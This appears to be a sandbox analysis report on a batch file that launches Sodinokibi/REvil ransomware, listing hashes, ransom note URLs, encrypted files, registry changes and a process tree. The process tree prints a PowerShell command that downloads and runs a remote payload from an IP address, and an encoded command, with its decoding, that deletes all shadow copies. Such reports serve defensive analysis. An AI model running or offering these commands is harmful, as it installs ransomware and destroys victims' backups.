Analysis
max time kernel: 139s
max time network: 158s
platform: windows7_x64
resource: win7v200430
submitted: 01-05-2020 15:10

Tasks
Static task static1
Behavioral task behavioral1: sample U00vnQbF.bat, resource win7v200430
Behavioral task behavioral2: sample U00vnQbF.bat, resource win10v200430
General
Target: U00vnQbF.bat
Size: 191B
MD5: 2300705e455665cbeb1087bfc25c672c
SHA1: 737493862ea5a0c4de10f4e2fda82000c45e8779
SHA256: adba07f4a5d9a769b00d436a0e7c89777664b8cc17bd2515e951572fff8a634f
SHA512: 26864b6c938379a876018ffcb1c927ff9806cb5fdc93d2088cf59ef3b7487bf81952c9e843d9ae1b3f827f3ba43dc7acf4b2a974e9bbfc709d58215982399911
Malware Config
Extracted from: http://185.103.242.78/pastes/U00vnQbF
Extracted from: C:\28b86t67-readme.txt
Family: sodinokibi
Ransom note URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5C323C8674D79305
  http://decryptor.cc/5C323C8674D79305
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives (3 TTPs)
-
Drops file in Program Files directory (18 IoCs)
Processes: powershell.exe
  File opened for modification \??\c:\program files\AssertRemove.eps
  File opened for modification \??\c:\program files\InitializeReceive.css
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\28b86t67-readme.txt
  File created \??\c:\program files (x86)\28b86t67-readme.txt
  File opened for modification \??\c:\program files\LockSelect.ppsm
  File opened for modification \??\c:\program files\UseAssert.svgz
  File opened for modification \??\c:\program files\SuspendRestore.3gp
  File opened for modification \??\c:\program files\SwitchMount.pptm
  File created \??\c:\program files\28b86t67-readme.txt
  File opened for modification \??\c:\program files\ConnectSet.kix
  File opened for modification \??\c:\program files\InvokeSave.pub
  File created \??\c:\program files\microsoft sql server compact edition\28b86t67-readme.txt
  File opened for modification \??\c:\program files\StepConvert.mpeg
  File opened for modification \??\c:\program files\StepSave.dotm
  File opened for modification \??\c:\program files\TraceBackup.m1v
  File opened for modification \??\c:\program files\ConvertFromResize.dotx
  File opened for modification \??\c:\program files\RegisterDebug.php
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\28b86t67-readme.txt
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe (PID 1428)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe (PID 1428, recorded three times); powershell.exe (PID 1076, recorded twice)
Blacklisted process makes network request (150 IoCs)
Processes: powershell.exe (PID 1428), one entry per network flow
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rs9bc9.bmp"
Modifies system certificate store
Processes: powershell.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 (Blob value set)
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C (Blob value set)
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (Blob value set)
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (Blob value set)
  (AuthRoot\Certificates is the store that Windows fills through its automatic root certificate update when a process validates a chain to a root that is not yet cached; entries appearing there during a burst of HTTPS requests should be checked against the Microsoft trusted root list before being treated as attacker-planted certificates.)
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
  File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Makes http(s) request (44 IoCs)
Contacts server via http/https, possibly for C2 communication.
Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  PID 1288 (cmd.exe) wrote to memory of PID 1428 (powershell.exe)
  PID 1428 (powershell.exe) wrote to memory of PID 1076 (powershell.exe), recorded four times
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  Token: SeDebugPrivilege, PID 1428 powershell.exe (recorded twice)
  Token: SeDebugPrivilege, PID 1076 powershell.exe
  Token: SeBackupPrivilege, PID 1736 vssvc.exe
  Token: SeRestorePrivilege, PID 1736 vssvc.exe
  Token: SeAuditPrivilege, PID 1736 vssvc.exe
  Token: SeTakeOwnershipPrivilege, PID 1428 powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\U00vnQbF.bat"
  PID: 1288
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/U00vnQbF');Invoke-HDBVPMGW;Start-Sleep -s 10000"
    PID: 1428
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Modifies system certificate store
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is UTF-16LE base64; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which is what triggers the vssvc.exe activity below and removes the Volume Shadow Copies a defender would otherwise restore from.)
      PID: 1076
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1736
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service